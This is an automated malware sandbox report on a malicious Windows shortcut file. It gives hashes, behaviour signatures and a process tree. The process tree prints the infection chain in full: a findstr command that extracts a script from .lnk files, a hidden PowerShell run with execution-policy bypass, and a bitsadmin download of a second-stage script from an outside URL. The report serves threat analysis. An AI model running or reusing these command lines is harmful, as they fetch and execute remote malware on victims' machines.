Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25-08-2024 19:01
Static task
static1
Behavioral task
behavioral1
Sample
pack-KRJ88981-99192.lnk
Resource
win7-20240708-en
General
-
Target
pack-KRJ88981-99192.lnk
-
Size
2KB
-
MD5
4163cb3655dfdae03d13d623dd9dc8db
-
SHA1
6183474325319e89dcf02e9bd54220d1d912638b
-
SHA256
0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7
-
SHA512
b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2796 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.execmd.execmd.exepowershell.execmd.exedescription pid process target process PID 2156 wrote to memory of 780 2156 cmd.exe cmd.exe PID 2156 wrote to memory of 780 2156 cmd.exe cmd.exe PID 2156 wrote to memory of 780 2156 cmd.exe cmd.exe PID 780 wrote to memory of 2960 780 cmd.exe findstr.exe PID 780 wrote to memory of 2960 780 cmd.exe findstr.exe PID 780 wrote to memory of 2960 780 cmd.exe findstr.exe PID 780 wrote to memory of 2756 780 cmd.exe cmd.exe PID 780 wrote to memory of 2756 780 cmd.exe cmd.exe PID 780 wrote to memory of 2756 780 cmd.exe cmd.exe PID 2756 wrote to memory of 2796 2756 cmd.exe powershell.exe PID 2756 wrote to memory of 2796 2756 cmd.exe powershell.exe PID 2756 wrote to memory of 2796 2756 cmd.exe powershell.exe PID 2796 wrote to memory of 2632 2796 powershell.exe cmd.exe PID 2796 wrote to memory of 2632 2796 powershell.exe cmd.exe PID 2796 wrote to memory of 2632 2796 powershell.exe cmd.exe PID 2632 wrote to memory of 2776 2632 cmd.exe bitsadmin.exe PID 2632 wrote to memory of 2776 2632 cmd.exe bitsadmin.exe PID 2632 wrote to memory of 2776 2632 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps12⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\findstr.exefindstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk3⤵PID:2960
-
C:\Windows\system32\cmd.execmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps16⤵
- Download via BitsAdmin
PID:2776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
941B
MD5367a305a4630d346d724dbb691efb600
SHA1d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd
SHA256eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea
SHA5129484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11